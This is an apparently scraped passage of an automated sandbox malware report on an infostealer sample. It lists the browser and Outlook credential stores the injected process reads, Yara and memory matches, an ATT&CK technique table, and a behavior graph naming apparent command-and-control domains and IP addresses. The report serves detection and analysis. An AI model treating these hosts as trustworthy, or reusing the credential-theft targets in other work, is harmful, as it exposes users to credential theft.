                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: gbdXRnNKkm.exeBinary or memory string: WIN_81
                Source: gbdXRnNKkm.exeBinary or memory string: WIN_XP
                Source: gbdXRnNKkm.exeBinary or memory string: WIN_XPe
                Source: gbdXRnNKkm.exeBinary or memory string: WIN_VISTA
                Source: gbdXRnNKkm.exeBinary or memory string: WIN_7
                Source: gbdXRnNKkm.exeBinary or memory string: WIN_8
                Source: gbdXRnNKkm.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 3.2.svchost.exe.4f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.4f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1412763215.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3660621967.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3660737432.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1414559541.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3660890231.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3658971513.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1412334229.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3667213701.0000000008450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B76283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00B76283
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B76747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00B76747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634607 Sample: gbdXRnNKkm.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 31 www.dolfisstillspinnin.xyz 2->31 33 www.sislieskort.xyz 2->33 35 8 other IPs or domains 2->35 39 Antivirus detection for URL or domain 2->39 41 Antivirus / Scanner detection for submitted sample 2->41 43 Multi AV Scanner detection for submitted file 2->43 47 3 other signatures 2->47 10 gbdXRnNKkm.exe 4 2->10         started        signatures3 45 Performs DNS queries to domains with low reputation 33->45 process4 signatures5 57 Binary is likely a compiled AutoIt script file 10->57 59 Writes to foreign memory regions 10->59 61 Maps a DLL or memory area into another process 10->61 63 Switches to a custom stack to bypass stack traces 10->63 13 svchost.exe 10->13         started        process6 signatures7 65 Maps a DLL or memory area into another process 13->65 16 D3y5b0UXPl.exe 13->16 injected process8 dnsIp9 25 kakeksakti43.cfd 198.252.98.84, 49720, 80 HAWKHOSTCA Canada 16->25 27 nan21.net 93.113.54.70, 49700, 49701, 49702 GTSCEGTSCentralEuropeAntelGermanyCZ Romania 16->27 29 5 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 takeown.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.